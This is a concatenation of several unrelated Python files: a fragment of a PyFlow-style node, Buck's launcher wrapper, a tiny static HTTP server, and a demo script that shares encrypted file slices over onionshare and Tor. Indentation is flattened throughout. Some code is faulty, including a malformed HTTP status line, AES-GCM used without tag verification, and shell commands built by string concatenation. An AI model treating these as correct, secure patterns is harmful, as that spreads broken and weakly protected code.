self.entity.setData("")
class ProcessObj(NodeBase):
def __init__(self, name):
super(ProcessObj, self).__init__(name)
self.inExec = self.createInputPin(DEFAULT_IN_EXEC_NAME, 'ExecPin', None, self.work)
self.entity = self.createInputPin('entity', 'AnyPin', structure=StructureType.Multi)
self.entity.enableOptions(PinOptions.AllowAny)
self.outExec = self.createOutputPin(DEFAULT_OUT_EXEC_NAME, 'ExecPin')
self.WordsToSay = self.createOutputPin("WordsToSay",'StringPin')
@staticmethod
def pinTypeHints():
helper = NodePinsSuggestionsHelper()
return helper
@staticmethod
def category():
return 'Tests'
def work(self, *args, **kwargs):
print("processObj Compute..")
# print(self.entity.getData())
# obj=self.entity.getData()
# obj.set_text("Pick a Bolt")
self.WordsToSay.setData("Pick a Bolt")
|
buck.py
|
#!/usr/bin/env python
from __future__ import print_function
import errno
import logging
import os
import re
import signal
import subprocess
import sys
import threading
import time
import uuid
import zipfile
from multiprocessing import Queue
from subprocess import check_output
from buck_logging import setup_logging
from buck_project import BuckProject, NoBuckConfigFoundException
from buck_tool import (
BuckDaemonErrorException,
BuckStatusReporter,
ExecuteTarget,
get_java_path,
install_signal_handlers,
)
from subprocutils import propagate_failure
from tracing import Tracing
class ExitCode(object):
"""Python equivalent of com.facebook.buck.util.ExitCode"""
SUCCESS = 0
COMMANDLINE_ERROR = 3
FATAL_GENERIC = 10
FATAL_BOOTSTRAP = 11
FATAL_IO = 13
FATAL_DISK_FULL = 14
SIGNAL_INTERRUPT = 130
SIGNAL_PIPE = 141
if sys.version_info < (2, 7):
import platform
print(
(
"Buck requires at least version 2.7 of Python, but you are using {}."
"\nPlease follow https://buckbuild.com/setup/getting_started.html "
+ "to properly setup your development environment."
).format(platform.version())
)
sys.exit(ExitCode.FATAL_BOOTSTRAP)
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
REQUIRED_JAVA_VERSION = "8"
# Kill all buck processes
def killall_buck(reporter):
# Linux or macOS
if os.name != "posix":
message = "killall is not implemented on: " + os.name
logging.error(message)
reporter.status_message = message
return ExitCode.COMMANDLINE_ERROR
for line in os.popen("jps -l"):
split = line.split()
if len(split) == 1:
# Java processes which are launched not as `java Main`
# (e. g. `idea`) are shown with only PID without
# main class name.
continue
if len(split) != 2:
raise Exception("cannot parse a line in jps -l outout: " + repr(line))
pid = int(split[0])
name = split[1]
if name != "com.facebook.buck.cli.bootstrapper.ClassLoaderBootstrapper":
continue
os.kill(pid, signal.SIGTERM)
# TODO(buck_team) clean .buckd directories
return ExitCode.SUCCESS
def _get_java_version(java_path):
"""
Returns a Java version string (e.g. "7", "8").
Information is provided by java tool and parsing is based on
http://www.oracle.com/technetwork/java/javase/versioning-naming-139433.html
"""
java_version = check_output([java_path, "-version"], stderr=subprocess.STDOUT)
# extract java version from a string like 'java version "1.8.0_144"'
match = re.search('java version "(?P<version>.+)"', java_version)
if not match:
return None
pieces = match.group("version").split(".")
if pieces[0] != "1":
# versions starting at 9 look like "9.0.4"
return pieces[0]
# versions <9 look like "1.8.0_144"
return pieces[1]
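# --- Editorial sketch (not part of this wrapper) ------------------------------
# Concrete examples of the version strings _get_java_version parses; the sample
# outputs below are illustrative, not captured from a real JVM.
def _example_parse_java_version():
    samples = {'java version "1.8.0_144"': "8",   # pre-9 scheme -> second piece
               'java version "9.0.4"': "9"}       # 9+ scheme -> first piece
    for text, expected in samples.items():
        match = re.search('java version "(?P<version>.+)"', text)
        pieces = match.group("version").split(".")
        parsed = pieces[1] if pieces[0] == "1" else pieces[0]
        assert parsed == expected
# ------------------------------------------------------------------------------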
def _try_to_verify_java_version(java_version_status_queue):
"""
Best effort check to make sure users have required Java version installed.
"""
java_path = get_java_path()
warning = None
try:
java_version = _get_java_version(java_path)
if java_version and java_version != REQUIRED_JAVA_VERSION:
warning = "You're using Java {}, but Buck requires Java {}.\nPlease follow \
https://buckbuild.com/setup/getting_started.html \
to properly setup your local environment and avoid build issues.".format(
java_version, REQUIRED_JAVA_VERSION
)
except:
# checking Java version is brittle and as such is best effort
warning = "Cannot verify that installed Java version at '{}' \
is correct.".format(
java_path
)
java_version_status_queue.put(warning)
def _try_to_verify_java_version_off_thread(java_version_status_queue):
""" Attempts to validate the java version off main execution thread.
The reason for this is to speed up the start-up time for the buck process.
testing has shown that starting java process is rather expensive and on local tests,
this optimization has reduced startup time of 'buck run' from 673 ms to 520 ms. """
verify_java_version_thread = threading.Thread(
target=_try_to_verify_java_version, args=(java_version_status_queue,)
)
verify_java_version_thread.daemon = True
verify_java_version_thread.start()
def _emit_java_version_warnings_if_any(java_version_status_queue):
""" Emits java_version warnings that got posted in the java_version_status_queue
queus from the java version verification thread.
There are 2 cases where we need to take special care for.
1. The main thread finishes before the main thread gets here before the version testing
thread is done. In such case we wait for 50 ms. This should pretty much never happen,
except in cases where buck deployment or the VM is really badly misconfigured.
2. The java version thread never testing returns. This can happen if the process that is
called java is hanging for some reason. This is also not a normal case, and in such case
we will wait for 50 ms and if still no response, ignore the error."""
if java_version_status_queue.empty():
time.sleep(0.05)
if not java_version_status_queue.empty():
warning = java_version_status_queue.get()
if warning is not None:
logging.warning(warning)
def main(argv, reporter):
java_version_status_queue = Queue(maxsize=1)
_try_to_verify_java_version_off_thread(java_version_status_queue)
def get_repo(p):
# Try to detect if we're running a PEX by checking if we were invoked
# via a zip file.
if zipfile.is_zipfile(argv[0]):
from buck_package import BuckPackage
return BuckPackage(p, reporter)
else:
from buck_repo import BuckRepo
return BuckRepo(THIS_DIR, p, reporter)
# If 'killall' is the second argument, shut down all the buckd processes
if sys.argv[1:] == ["killall"]:
return killall_buck(reporter)
install_signal_handlers()
try:
tracing_dir = None
build_id = os.environ.get("BUCK_BUILD_ID", str(uuid.uuid4()))
reporter.build_id = build_id
with Tracing("main"):
with BuckProject.from_current_dir() as project:
tracing_dir = os.path.join(project.get_buck_out_log_dir(), "traces")
with get_repo(project) as buck_repo:
# If 'kill' is the second argument, shut down the buckd
# process
if sys.argv[1:] == ["kill"]:
buck_repo.kill_buckd()
return ExitCode.SUCCESS
return buck_repo.launch_buck(build_id)
finally:
if tracing_dir:
Tracing.write_to_dir(tracing_dir, build_id)
_emit_java_version_warnings_if_any(java_version_status_queue)
if __name__ == "__main__":
exit_code = ExitCode.SUCCESS
reporter = BuckStatusReporter(sys.argv)
fn_exec = None
exception = None
try:
setup_logging()
exit_code = main(sys.argv, reporter)
except ExecuteTarget as e:
# this is raised once 'buck run' has the binary
# it can get here only if exit_code of corresponding buck build is 0
fn_exec = e.execve
except NoBuckConfigFoundException:
exc_type, exception, exc_traceback = sys.exc_info()
# buck is started outside project root
exit_code = ExitCode.COMMANDLINE_ERROR
except BuckDaemonErrorException:
reporter.status_message = "Buck daemon disconnected unexpectedly"
_, exception, _ = sys.exc_info()
print(str(exception))
exception = None
exit_code = ExitCode.FATAL_GENERIC
except IOError as e:
exc_type, exception, exc_traceback = sys.exc_info()
if e.errno == errno.ENOSPC:
exit_code = ExitCode.FATAL_DISK_FULL
elif e.errno == errno.EPIPE:
exit_code = ExitCode.SIGNAL_PIPE
else:
exit_code = ExitCode.FATAL_IO
except KeyboardInterrupt:
reporter.status_message = "Python wrapper keyboard interrupt"
exit_code = ExitCode.SIGNAL_INTERRUPT
except Exception:
exc_type, exception, exc_traceback = sys.exc_info()
exit_code = ExitCode.FATAL_BOOTSTRAP
if exception is not None:
logging.error(exception, exc_info=(exc_type, exception, exc_traceback))
if reporter.status_message is None:
reporter.status_message = str(exception)
# report result of Buck call
try:
reporter.report(exit_code)
except Exception as e:
logging.debug(
"Exception occurred while reporting build results. This error is "
"benign and doesn't affect the actual build.",
exc_info=True,
)
# execute 'buck run' target
if fn_exec is not None:
fn_exec()
propagate_failure(exit_code)
|
lite_http.py
|
import socket, threading, os
"""
A simple lite static web server based Python with **less 200 line**
"""
log = print
STATIC_DIR = 'static'
PAGE_404 = '404.html'
PAGE_METHOD_NOT_SUPPORT = 'method_not_support.html'
REQUEST_MAX_LENGTH = 1024 * 1024
HEADER_CONTENT_TYPE = ('Content-Type', 'text/html; charset=UTF-8')
RESPONSE_FIRST_VERSION = 'HTTP-Version: HTTP/1.0'
static_list = []
class Request():
def __init__(self, orign_request, addr):
self.path = None
self.method = None
self.signature = None
self.headers = dict()
self.body = None
self.orignal_request = orign_request
self.host, self.port = addr
self.__parse_request__(orign_request)
def __parse_request__(self, request):
twopart = [x for x in request.split('\r\n\r\n') if x]
self.__parse_headers_and_signature__(twopart[0])
if len(twopart) == 2:
# the request has a body
self.body = twopart[1]
def __parse_headers_and_signature__(self, headers_part):
lines = headers_part.split("\r\n")
self.signature = lines[0]
# headers of request
for header in range(1, len(lines)):
if lines[header].startswith('Host'):
self.headers['Host'] = lines[header].split(":")[1:]
continue
item = lines[header].split(":", 2)
self.headers[item[0]] = item[1].strip()
# parse like 'GET / HTTP/1.1'
self.method, self.path, *other = self.signature.split(' ')
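# --- Editorial sketch (not part of the original server) -----------------------
# Shows what Request extracts from a raw HTTP message. The request text and
# address below are made-up sample values.
def _example_parse_request():
    raw = ("GET /index.html HTTP/1.1\r\n"
           "Host: localhost:8080\r\n"
           "User-Agent: demo\r\n"
           "\r\n")
    req = Request(raw, ("127.0.0.1", 54321))
    # req.method == 'GET', req.path == '/index.html',
    # req.headers['User-Agent'] == 'demo',
    # req.headers['Host'] == [' localhost', '8080'] (Host is split on every ':')
    return req
# ------------------------------------------------------------------------------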
class Response():
"""
Http Response. Note: The body's type is bytes
"""
def __init__(self, status=200, headers=None, body=None, message='ok'):
self.status = status
self.headers = headers if headers is not None else {}  # avoid a shared mutable default dict
self.body = body
self.message = message
@classmethod
def ok(cls, body=None):
res = Response(body=body)
res.body = body
if body:
res.headers['Content-Length'] = str(len(body))
return res
@classmethod
def not_found(cls):
return Response(status=404, message='Not Found')
@classmethod
def bad_request(cls):
return Response(status=400, message='Bad Request')
def source_view(self):
"""
Convert the Response into its raw on-the-wire form. Type is bytes.
"""
header_of_response = str()
signature = ' '.join([RESPONSE_FIRST_VERSION, str(self.status), self.message])
headers_str = str()
for title, content in self.headers.items():
headers_str += ': '.join([title, content])
headers_str += '\r\n'
headers_str = headers_str[:-2]  # strip the trailing extra '\r\n'
body = self.body
header_of_response += '\r\n'.join([signature, headers_str])
response = bytes(header_of_response + '\r\n\r\n', encoding='utf-8')
if body:
response += body
return response
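# --- Editorial sketch (not part of the original server) -----------------------
# Illustrates the raw bytes produced by Response.source_view() for a tiny body;
# the Content-Type header reuses the module-level HEADER_CONTENT_TYPE constant.
def _example_source_view():
    res = Response.ok(body=b"hello")
    res.headers[HEADER_CONTENT_TYPE[0]] = HEADER_CONTENT_TYPE[1]
    # -> b'HTTP-Version: HTTP/1.0 200 ok\r\nContent-Length: 5\r\n'
    #    b'Content-Type: text/html; charset=UTF-8\r\n\r\nhello'
    return res.source_view()
# ------------------------------------------------------------------------------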
def file(page) -> bytes:
"""
Open a file and return its content (type: bytes).
"""
with open(os.path.join(STATIC_DIR, page), 'rb') as file:
body = file.read()
return body
def handle_get_request(request) -> Response:
path = request.path
if path == '/':
return Response.ok(body=file('index.html'))
global static_list
if not static_list:
static_list = os.listdir(STATIC_DIR)
if path[1:] in static_list:
return Response.ok(body=file(path[1:]))
else:
return Response.ok(body=file(PAGE_404))
def method_not_support(method) -> Response:
try:
body = file(PAGE_METHOD_NOT_SUPPORT)
return Response(405, body=body, message='Method %s Not Allowed' % method)
except FileNotFoundError as e:
return Response.bad_request()
def handle_request(request: Request) -> Response:
if request.method.lower() == 'get':
return handle_get_request(request)
if request.method.lower() == 'options':
return Response.ok()
return method_not_support(request.method.lower())
def after_handle_response(response):
# Handle cross-origin (CORS) requests; useful for testing
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers[
"Access-Control-Allow-Headers"] = ("Content-Type,Content-Length, "
"Authorization, Accept,X-Requested-With")
response.headers["Access-Control-Allow-Methods"] = "PUT,POST,GET,DELETE,OPTIONS"
def accept_socket(sock: socket.socket, addr):
ori_request = sock.recv(REQUEST_MAX_LENGTH)
# parse original request to the special format for human
request = Request(ori_request.decode('utf-8'), addr)
log("Accept new http request: %s" % request.signature)
log(" original http request:\n", ori_request)
response = handle_request(request)
after_handle_response(response)
response_bytes = response.source_view()
log('Send http response:', response_bytes)
sock.send(response_bytes)
sock.close()
def start(host, port):
"""start web server, it will run forever
"""
global _main
_main = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_main.bind((host, port))
_main.listen()
while True:
sock, addr = _main.accept()
log('Accept new connection %s:%s' % addr)
threading.Thread(target=accept_socket, args=(sock, addr)).start()
if __name__ == '__main__':
start("0.0.0.0", 8080)
|
executeDemo.py
|
#This is a version of execute.py intended for demo purposes.
#Normally, when running the program there are 3 file transfers:
#1. User task file to provider (1.2GB image.zip)
#2. Provider result file to validator (already ran image)
#3. Provider result file to user
#This version of execute will skip the first two file transfers.
#The last one is left in to demonstrate the file transfer and that the user receives the file.
#Note that the regular user execute.py will work for this goal.
#For this to work, the provider must already have the task file (1.2GB) in their directory,
# and the validator must already have the result file in their directory.
import os
import sys
import requests as r
import time
import json
from signal import signal, SIGINT
import threading
from datetime import datetime
import math
import subprocess
import multiprocessing
from multiprocessing import Manager, Value
from ctypes import c_char_p
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
##globals##
threads = 8
threadL = []
orderAddr = []
order = []
startTimes = []
mainThread = None
manager = Manager()
totalAddr = manager.Value(c_char_p, '')
totalStartTime = Value('d', 0.0)
content = []
for i in range(threads):
content.append(b'')#inits list with threads number of empty byte arrays
mode = '' #user, provider, or validator
fileName = ''
encKey = None
encNonce = None
#######################################################################################################################################
#######################################################encryption######################################################################
#######################################################################################################################################
def genKey():
keyFile = "key.txt"
nonceFile = "nonce.txt"
f = open(keyFile, 'w')
f.close()
f = open(nonceFile, 'w')
f.close()
key = os.urandom(32)
nonce = os.urandom(32)
f = open(keyFile, 'wb')
f.write(key)
f.close()
f = open(nonceFile, 'wb')
f.write(nonce)
f.close()
def getKey(keyFile="", nonceFile=""):
f = open(keyFile, 'rb')
key = f.read()
f.close()
f = open(nonceFile, 'rb')
nonce = f.read()
f.close()
return [key, nonce]
def enc(key=b"", nonce=b"", mess=b""):
alg = algorithms.AES(key)
cipher = Cipher(alg, modes.GCM(nonce), default_backend())
encryptor = cipher.encryptor()
return encryptor.update(mess)
def dec(key=b"", nonce=b"", mess=b""):
alg = algorithms.AES(key)
cipher = Cipher(alg, modes.GCM(nonce), default_backend())
decryptor = cipher.decryptor()
return decryptor.update(mess)
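# --- Editorial sketch (not part of the original script) -----------------------
# A minimal round-trip check for the enc()/dec() helpers above. Note that they
# only call update() (no finalize and no tag verification), so decryption here
# recovers the plaintext but does not authenticate it; the sample message is
# made up for illustration.
def encRoundTripDemo():
    key = os.urandom(32)
    nonce = os.urandom(32)
    message = b"demo payload"
    assert dec(key, nonce, enc(key, nonce, message)) == message
# ------------------------------------------------------------------------------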
genKey()
#######################################################################################################################################
###########################################################host########################################################################
#######################################################################################################################################
def shareOrder():
global totalStartTime
while os.path.isfile('totalOrder.txt') != True:
time.sleep(5)
totalStartTime.value = time.time()
######zip the total order, key, and nonce to share#########
os.system('zip totalOrder.zip totalOrder.txt key.txt nonce.txt >/dev/null 2>&1')
time.sleep(5)
###########################################################
subprocess.Popen(["script -c \"../../../onionshare/dev_scripts/onionshare --website totalOrder.zip" + "\" -f onionshareOrder.txt"],stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL,shell=True)
def startShare(file, iter):
#print(file + ":" + str(iter))
#start onionshare server to host file
subprocess.Popen(["script -c \"../../../onionshare/dev_scripts/onionshare --website " + file + "\" -f onionshare" + str(iter) + ".txt"],stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL,shell=True)
def splitFile(file):
fileName = file
f = open(file,'rb')
content = f.read()
contentLen = len(content)
pos = 0
#print(lines)
for i in range(0, threads):
fw = open(file+str(i)+'.txt' ,'wb')
lo = int((i)*(contentLen/threads))
hi = int((i+1)*(contentLen/threads))
fw.write(content[lo:hi])
fw.close()
order.append(file+str(i)+'.txt\n')
keyFile = open("key.txt", 'rb')
key = keyFile.read()
keyFile.close()
nonceFile = open("nonce.txt", "rb")
nonce = nonceFile.read()
nonceFile.close()
fenc = open(file+str(i)+'.txt', "rb")
hold = enc(key, nonce, fenc.read())
fenc.close()
fenc = open(file + str(i) + ".txt", "w")
fenc.close()
fenc = open(file+str(i)+".txt", "wb")
fenc.write(hold)
fenc.close()
f.close()
f = open('order.txt', 'w')
f.writelines(order)
f.close()
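# --- Editorial sketch (not part of the original script) -----------------------
# Illustrates the slice boundaries splitFile() computes. For an assumed
# 1,000,000 byte input and the 8 threads configured above, slice i covers
# bytes [int(i * 125000), int((i + 1) * 125000)); for these sizes the last
# boundary equals the file length, so nothing is dropped.
def sliceBoundsDemo(contentLen=1000000, parts=threads):
    return [(int(i * (contentLen / parts)), int((i + 1) * (contentLen / parts)))
            for i in range(parts)]
# ------------------------------------------------------------------------------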
def createThreadsHost():
f = open("order.txt" , 'r')
orderFile = f.readlines()
f.close()
j = 0
for i in orderFile:
#t=threading.Thread(target=startShare,args=[i.strip('\n'),j])
t=multiprocessing.Process(target=startShare,args=(i.strip('\n'),j,))
threadL.append(t)
j += 1
def runThreads():
for i in threadL:
i.daemon = True
i.start()
startTimes.append(time.time())
#print(startTimes)
def getAddrs():
#for i in range(0,threads):
#orderAddr.append(0)
t = 0
while t < threads:
global orderAddr
t = 0
for i in orderAddr:
if i != 0:
t +=1
for i in range(0,threads):
if os.path.isfile('onionshare'+str(i)+'.txt'):
f = open('onionshare'+str(i)+'.txt', 'r')
lines = f.readlines()
f.close()
for j in lines:
if (j.find("http://onionshare") >= 0): #found address
orderAddr[i] = j.strip('\n') + "/" + order[i].strip('\n')
print(orderAddr)
time.sleep(5)
print(orderAddr)
f = open('totalOrder.txt', 'w')
for i in orderAddr:
f.write(i + '\n')
f.close()
def getTotalAddr():
global totalAddr
flag = True
while(flag):
if os.path.isfile('onionshareOrder.txt'):
f = open('onionshareOrder.txt', 'r')
lines = f.readlines()
f.close()
for j in lines:
if (j.find("http://onionshare") >= 0): #found address
totalAddr.value = j.strip('\n') + "/totalOrder.zip"
flag = False
time.sleep(5)
#Write address to file
f = open('totalOrderAddress.txt', 'w')
f.write(totalAddr.value)
f.close()
def threadRestarter():
#for i in range(0,threads):
#orderAddr.append(0)
global orderAddr
while(True):
#global orderAddr
#print("addrs:"+ str(orderAddr))
try:
for i in range(0,len(startTimes)):
global orderAddr
if time.time() > startTimes[i] + 120 and orderAddr[i] == 0:
os.system('rm onionshare' + str(i) + '.txt')
#threadL[i]._delete()
threadL[i].terminate()
f = open("order.txt" , 'r')
lines = f.readlines()
f.close()
#t=threading.Thread(target=startShare,args=[lines[i].strip('\n'),i])
t=multiprocessing.Process(target=startShare,args=(lines[i].strip('\n'),i,))
t.daemon = True
threadL[i] = t
threadL[i].start()
holdVal = startTimes[i]
startTimes[i] = time.time()
f = open('restart.txt', 'a')
f.write("thread:" + str(i) + ' has been restarted at:' + str(time.time()) + ' due to time issue. It started at:'+str(holdVal)+' and should end at:'+str(holdVal+120)+' and addr:'+ str(orderAddr[i])+'\n')
f.close()
for i in range(0,threads):
if os.path.isfile('onionshare' + str(i) + '.txt' ):
f = open('onionshare' + str(i) + '.txt' )
lines = f.readlines()
for line in lines:
if line.find('in use') >= 0:
os.system('rm onionshare' + str(i) + '.txt')
#threadL[i]._delete()
threadL[i].terminate()
f = open("order.txt" , 'r')
lines = f.readlines()
f.close()
#t=threading.Thread(target=startShare,args=[lines[i].strip('\n'),i])
t=multiprocessing.Process(target=startShare,args=(lines[i].strip('\n'),i,))
t.daemon = True
threadL[i] = t
threadL[i].start()
startTimes[i] = time.time()
f = open('restart.txt', 'a')
f.write("thread:" + str(i) + ' has been restarted at:' + str(time.time()) + ' due to address error\n')
f.close()
t = 0
for i in orderAddr:
if i != 0:
t +=1
for i in range(0,threads):
if os.path.isfile('onionshare'+str(i)+'.txt') and orderAddr[i] == 0:
f = open('onionshare'+str(i)+'.txt', 'r')
lines = f.readlines()
f.close()
for j in lines:
if (j.find("http://onionshare") >= 0): #found address
orderAddr[i] = j.strip('\n') + "/" + order[i].strip('\n')
if t == threads:
f = open('totalOrder.txt', 'w')
for i in orderAddr:
f.write(i + '\n')
f.close()
except:
pass
#Print a string with each file's percentage
toprint = ""
for i in range(threads):
try: #Will fail if index not found, then just ignore
f = open('onionshare'+str(i)+'.txt', 'r')
#Get string of percentage for file slice
wholetext = f.read()
f.close()
percentindex = wholetext.rindex("%") #Finds the position of the last percent
spaceindex = wholetext.rindex(" ", 0, percentindex) #Finds the position of the last space before the percent
percentage = wholetext[spaceindex+1:percentindex+1] #Skips the space but includes the percent
toprint += str(i) + ": " + percentage + ("" if i == threads-1 else ", ") #Formats string
except: pass
print(toprint + "\r", end="") #recurrent character so it rewrites last line instead of making new lines
time.sleep(5)
def hostReqFail():
subprocess.Popen(["script -c \"~/onionshare/dev_scripts/onionshare --website reqFails.txt" + "\" -f reqFailLog.txt"],stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True)
def reqFail():
#failThread = threading.Thread(target=hostReqFail)
failThread = multiprocessing.Process(target=hostReqFail)
threadOn = False
global threads
reqMade = [0]*threads
callSum = 0
while True:
time.sleep(120)
for i in range(0,threads):
if os.path.isfile('onionshare' + str(i) + '.txt'):
f = open('onionshare' + str(i) + '.txt')
lines = f.readlines()
f.close()
for line in lines:
if reqMade[i] == 0 and line.find('get') >= 0:
reqMade[i] = 1
callSum += 1
if callSum >= (threads/2) and callSum != threads:
f = open('reqFails.txt', 'w')
for i in range(0,threads):
if reqMade[i] == 0:
f.write(str(i)+'\n')
if threadOn:
#failThread._delete()
failThread.terminate()
#failThread = threading.Thread(target=hostReqFail)
failThread = multiprocessing.Process(target=hostReqFail)
failThread.daemon = True
failThread.start()
threadOn = True
else:
failThread.start()
threadOn = True
if callSum == threads:
#failThread._delete()
failThread.terminate()
threadOn = False
#################################################################################################################
#################################################################################################################
#################################################################################################################
def totalThreadRestarter():
global totalStartTime
global totalAddr
global mainThread
mainThread = multiprocessing.Process(target=shareOrder)
mainThread.daemon = True
mainThread.start()
while (True):
if (totalStartTime.value != 0.0) and time.time() > (totalStartTime.value + 60) and totalAddr.value == '':
os.system('rm onionshareOrder.txt >/dev/null 2>&1')
#restart thread
#mainThread._delete()
mainThread.terminate()
#t = threading.Thread(target=shareOrder)
t = multiprocessing.Process(target=shareOrder)
t.daemon = True
mainThread = t
mainThread.start()
f = open('restart.txt', 'a')
f.write("thread: for totalOrder has been restarted at:" + str(time.time()) + ' due to time issue\n')
f.close()
time.sleep(5)
def resetHost(resetMode):
global threadL
global orderAddr
global order
global startTimes
global totalStartTime
global mode
global fileName
global totalAddr
for i in threadL:
try: #May or may not already be deleted
#i._delete()
i.terminate()
except: pass
threadL = []
orderAddr = []
order = []
startTimes = []
totalStartTime.value = 0.0
if resetMode == True:
mode = ''
totalAddr.value = ''
try:
os.system('rm restart.txt totalOrderAddress.txt totalOrder.txt onionShareOrder.txt onionshare*.txt order.txt image.zip*.txt >/dev/null 2>&1')
except:
pass
fileName = ''
#new memory and command line reset
os.system("reset")
os.system("ps aux > ps.txt")
f = open("ps.txt", 'r')
line = f.readline()
while line != '':
if line.find('onionshare') != -1:
try:
os.system('kill -9 ' + line.split()[1] + ' >/dev/null 2>&1')
except:
pass
line = f.readline()
f.close()
try:
os.system('rm ps.txt')
except:
pass
def failingCheck():
global threadL
while True:
time.sleep(120)
positions = []
try:
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
fails = session.get(totalAddr.value + '/reqFails.txt')
f = open('reqFails.txt', 'wb')
f.write(fails.content)
f.close()
f = open('reqFails.txt', 'r')
lines = f.readlines()
f.close()
for line in lines:
positions.append(int(line.rstrip()))
f = open('totalOrder.txt', 'r')
lines = f.readlines()
for pos in positions:
#threadL[pos]._delete()
threadL[pos].terminate()
#threadL[pos] = threading.Thread(target=getShare,args=[lines[pos].rstrip(),pos])
threadL[pos] = multiprocessing.Process(target=getShare,args=(lines[pos].rstrip(),pos,))
threadL[pos].daemon = True
threadL[pos].start()
except:
pass
#######################################################################################################################################
########################################################request########################################################################
#######################################################################################################################################
def getShare(address, iter):
global content
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
res = session.get(address) #download file
#content[iter] = res.content #append this slice's content to total content list
########################get key and nonce##################################
[key, nonce] = getKey("key.txt","nonce.txt")
###########################################################################
f = open("image.zip" + str(iter) + ".txt","wb" )
f.write(dec(key, nonce, res.content))
f.close()
#print(type("-----Received content from thread " + iter))
#for i in range(threads):
# print(len(content[i]))
#This thread unneeded now, can safely kill it
killMe(iter)
def getShareWithoutIter(address):
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
res = session.get(address) #download file
#########save the zip and unzip it#########
open("totalOrder.zip", 'wb').write(res.content)
time.sleep(5)
os.system("unzip -o totalOrder.zip")
###########################################
def createThreadsReq():
global totalAddr
global content
global mode
flag = True
flagTwo = True
flagThree = True
#Most things here removed since they're just various steps in waiting for the file to be done transferring
while flag:
time.sleep(5)
#Addresses written to file (Step 2)
# if os.path.isfile("totalOrder.txt") and flagTwo:
# print("Downloading file from host. This may take a while...")
# flagTwo = False
# #Need to make a thread for each address
# f = open("totalOrder.txt", 'r')
# lines = f.readlines()
# f.close()
# j = 0
# for line in lines:
# #t = threading.Thread(target=getShare,args=[line.strip('\n'), j])
# t = multiprocessing.Process(target=getShare,args=(line.strip('\n'), j,))
# threadL.append(t)
# t.start()
# j += 1
# #Every slot in content has been written to (Step 3)
# allVal = True
# for i in range(0,threads):
# if os.path.isfile("image.zip" + str(i) + ".txt"):
# content[i] = True
# else:
# allVal = False
# break
# if allVal:
# if mode == 'user' or mode == 'provider':
# session = r.session()
# session.proxies = {}
# session.proxies['http'] = 'socks5h://localhost:9050'
# session.proxies['https'] = 'socks5h://localhost:9050'
# session.get(totalAddr.value + '/finish') #tell server finished downloading
# totalFile = open('image.zip', 'wb')
# for i in range(0, threads):
# iterFile = open('image.zip' + str(i) + '.txt', 'rb')
# totalFile.write(iterFile.read())
# iterFile.close()
# totalFile.close()
# flag = False
# resetReq()
#totalOrder.txt not yet received (Step 1)
if flagThree:
statF = open("stat.txt", 'r')
totalAddr.value = statF.readline().rstrip()
statF.close()
#if file ready to be received from worker. totalAddr will hold the .onion address
if totalAddr.value != '' and totalAddr.value != 'Executing' and totalAddr.value != 'Ready':
flagThree = False
#getShareWithoutIter(totalAddr) #Still need to get this to get key and nonce
flag = False #This will cause loop to exit and image.zip to start running
#Tell user program to stop
if mode == 'provider':
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
session.get(totalAddr.value + '/finish') #tell server finished downloading
def resetReq():
global content
global threadL
global mode
global mainThread
global totalAddr
content = []
for i in range(threads):
content.append(False)
#content.append(b'')#inits list with threads number of empty byte arrays
#kill all threads before resetting
for i in threadL:
try: #May or may not already be deleted
#i._delete()
i.terminate()
except: pass
threadL = []
mainThread = None
totalAddr.value = ''
mode = ''
try:
os.system('rm totalOrder.txt onionShareOrder.txt image.zip*.txt')
except:
pass
#new memory and command line reset
os.system("reset")
os.system("ps aux > ps.txt")
f = open("ps.txt", 'r')
line = f.readline()
while line != '':
if line.find('onionshare') != -1:
try:
os.system('kill ' + line.split()[1])
except:
pass
line = f.readline()
f.close()
f = open('stat.txt', 'w')
f.close()
try:
os.system('rm ps.txt')
except:
pass
#kill specified thread
def killMe(iter):
#threadL[iter]._delete()
try:
threadL[iter].terminate()
except:
pass
#######################################################################################################################################
#####################################################controller########################################################################
#######################################################################################################################################
def getTime(mess):
now = datetime.now()
end = open('log.txt', 'r').readline().rstrip()[24:]
#print(now.strftime("%a %b %d %Y %H:%M:%S" + end))
time = now.strftime("%a %b %d %Y %H:%M:%S" + end)
f = open('log.txt', 'a')
f.write('\n' + time + " "+ mess)
f.close()
def hostController(file):
global totalAddr
totalAddr.value = '' #Reset totalAddr for total thread restarter
genKey()
for i in range(0,threads):
orderAddr.append(0)
splitFile(file)
createThreadsHost()
runThreads()
errCorr = multiprocessing.Process(target=threadRestarter)
#errCorr.daemon = True  # daemonic processes can't have children
errCorr.start()
#getAddrs()
#failThread = threading.Thread(target=reqFail)
failThread = multiprocessing.Process(target=reqFail)
failThread.daemon = True
failThread.start()
global mainThread
#Restarter for total share
#errCorrMain = threading.Thread(target=totalThreadRestarter)
errCorrMain = multiprocessing.Process(target=totalThreadRestarter)
#errCorrMain.daemon = True  # daemonic processes can't have children
errCorrMain.start()
getTotalAddr()
flag = True
while flag:
if os.path.isfile('onionshareOrder.txt'):
f = open('onionshareOrder.txt', 'r')
line = f.readline()
while line != '':
if "/finish" in line :
flag = False
try: #May or may not already be deleted
errCorr.terminate()
except: pass
try: #May or may not already be deleted
errCorrMain.terminate()
except: pass
try: #May or may not already be deleted
mainThread.terminate()
except: pass
line = f.readline()
f.close()
try: #May or may not already be deleted
failThread.terminate()
except: pass
resetHost(True)
def reqController():
#failThread = threading.Thread(target=failingCheck)
failThread = multiprocessing.Process(target=failingCheck)
failThread.daemon = True
failThread.start()
createThreadsReq()
try: #May or may not already be deleted
#failThread._delete()
failThread.terminate()
except: pass
def dockerExe():
global mode
#time.sleep(30) #not needed for demo
f = open('stat.txt', 'w')
f.close()
f = open('stat.txt', 'w')
f.write('Executing')
f.close()
